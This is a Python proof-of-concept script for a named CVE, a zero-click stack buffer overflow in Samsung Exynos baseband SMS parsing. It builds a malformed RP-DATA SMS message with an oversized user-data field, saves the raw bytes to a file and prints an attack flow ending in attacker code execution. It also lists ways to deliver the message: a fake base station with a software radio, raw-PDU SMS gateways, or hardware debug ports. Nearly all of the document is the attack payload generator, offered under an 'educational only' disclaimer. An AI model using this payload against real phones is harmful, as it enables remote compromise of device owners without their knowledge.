#!/usr/bin/env python3
"""
Conceptual PoC for CVE-2025-54328
Samsung Exynos SMS RP-DATA Stack-based Buffer Overflow

This script generates a malicious RP-DATA message with an oversized TPDU
payload designed to overflow a fixed-size stack buffer in the Samsung
Shannon baseband firmware's SMS parser.

Full article: https://www.hunt-benito.com/samsung-exynos-sms-stack-overflow-cve-2025-54328-critical-zero-click-baseband-rce/

FOR EDUCATIONAL AND AUTHORIZED SECURITY RESEARCH ONLY.
"""

import struct
import sys


def build_rp_data_overflow(target_number: str = "1234567890", overflow_size: int = 200) -> bytes:
    """
    Build a malicious RP-DATA (Network -> MS) message.

    RP-DATA format per 3GPP TS 24.011 Section 7.3.1:
    - Message Type: 1 octet (0x00 = network to MS)
    - Message Reference: 1 octet
    - RP-Originator Address: variable (Length + BCD address)
    - RP-Destination Address: variable (Length + BCD address)
    - RP-User Data: variable (Length + TPDU)

    The field layout and the constant octet values used below are the
    author's; they are not re-verified against the specification here.

    Args:
        target_number: Destination number as a string of decimal digits.
            Every leading ``+`` is stripped; nothing else is validated.
        overflow_size: Number of filler octets placed in the TP-User-Data
            field; the same value is written to the one-octet length field
            that precedes it.

    Returns:
        The serialized RP-DATA message as ``bytes``.

    Raises:
        ValueError: if ``target_number`` still contains a non-digit character
            after stripping (``int()`` on the digit pairs), or if
            ``overflow_size`` is outside 0..255 (it is appended to a
            ``bytearray`` as a single octet).
        struct.error: if the assembled TPDU is longer than 255 octets, since
            its length is packed with the one-octet ``'B'`` format.
    """
    msg_type = 0x00  # RP message type octet, value as given by the author
    msg_ref = 0x01  # RP message reference octet
    rp_originator = b'\x00'  # RP-Originator Address: length 0, i.e. no address octets follow

    # lstrip('+') drops every leading '+'; anything left must be a decimal digit.
    digits = target_number.lstrip('+')
    # Two digits per octet: first digit of each pair in the high nibble, second in
    # the low nibble; an unpaired trailing digit is padded with 0xF.
    dest_addr_digits = bytes([
        (int(digits[i]) << 4) | (int(digits[i+1]) if i+1 < len(digits) else 0x0f)
        for i in range(0, len(digits), 2)
    ])
    # +1 accounts for the type-of-address octet inserted before the digits.
    dest_len = len(dest_addr_digits) + 1
    # 0x91 is the type-of-address octet (international number, ISDN numbering plan).
    rp_destination = struct.pack('B', dest_len) + b'\x91' + dest_addr_digits

    # TPDU assembly. Octet order is the wire format; field names below are the
    # reviewer's reading of a TS 23.040 SMS-DELIVER layout -- confirm.
    tpdu = bytearray()
    tpdu.append(0x04)  # first TPDU octet (message-type / flag bits)
    tpdu.extend(b'\x02\x91\x12\xf1')  # presumably TP-OA: length, 0x91 TOA, BCD digits
    tpdu.append(0x00)  # presumably TP-PID
    tpdu.append(0x00)  # presumably TP-DCS
    tpdu.extend(b'\x62\x40\x60\x21\x00\x00\x00')  # 7-octet field, presumably TP-SCTS
    # TP-UDL is a single octet, so overflow_size must be 0..255 or append() raises.
    tpdu.append(overflow_size)
    pattern = b'\x41' * overflow_size  # TP-UD filler: overflow_size copies of 'A'
    tpdu.extend(pattern)

    # RP-User Data = one-octet length + TPDU; struct.error if len(tpdu) > 255.
    rp_user_data = struct.pack('B', len(tpdu)) + tpdu

    rp_data = bytes([msg_type, msg_ref]) + rp_originator + rp_destination + rp_user_data
    return rp_data


def main() -> None:
    """
    CLI entry point: build the message, print a summary and a partial hex
    dump, and write the raw bytes to a fixed filename in the current
    working directory.

    ``sys.argv[1]``, when present, is passed through as the target number
    without validation; ``build_rp_data_overflow`` raises ``ValueError`` on
    non-digit input. ``overflow_size`` is hard-coded to 200.
    """
    print("=" * 60)
    print("CVE-2025-54328 - Conceptual PoC")
    print("Samsung Exynos SMS RP-DATA Stack Buffer Overflow")
    print("=" * 60)
    print()

    # Optional first CLI argument overrides the default target number.
    if len(sys.argv) > 1:
        target = sys.argv[1]
    else:
        target = "1234567890"

    overflow_size = 200

    rp_data = build_rp_data_overflow(target, overflow_size)

    print(f"[*] Target MSISDN: {target}")
    print(f"[*] Overflow payload size: {overflow_size} bytes")
    print(f"[*] Total RP-DATA message size: {len(rp_data)} bytes")
    print()

    # Hex dump of at most the first 64 octets, 16 per row.
    print("[*] RP-DATA hex dump (first 64 bytes):")
    for i in range(0, min(64, len(rp_data)), 16):
        hex_str = ' '.join(f'{b:02x}' for b in rp_data[i:i+16])
        print(f" {i:04x}: {hex_str}")
    if len(rp_data) > 64:
        print(f" ... ({len(rp_data) - 64} more bytes)")
    print()

    # Author's description of the intended trigger path; not verified here.
    print("[*] Attack flow:")
    print(" 1. Baseband receives RP-DATA on NAS/SAPI=3 bearer")
    print(" 2. Shannon firmware parses RP-User Data field")
    print(f" 3. TP-UD ({overflow_size} bytes) copied into fixed-size stack buffer")
    print(" 4. Stack buffer overflows -> return address overwritten")
    print(" 5. Execution redirected to attacker-controlled code")
    print()

    # Fixed filename relative to the CWD; silently overwrites an existing file.
    output_file = "cve-2025-54328-poc-rpdata.bin"
    with open(output_file, 'wb') as f:
        f.write(rp_data)
    print(f"[+] Raw RP-DATA message saved to: {output_file}")
    print()

    print("[!] To inject this message, you would need:")
    print(" - A fake BTS (OpenBTS/srsRAN) + SDR (USRP/HackRF)")
    print(" - Or an SMS gateway with raw PDU mode access")
    print(" - Or direct memory injection via JTAG/UART on the baseband")


if __name__ == '__main__':
    main()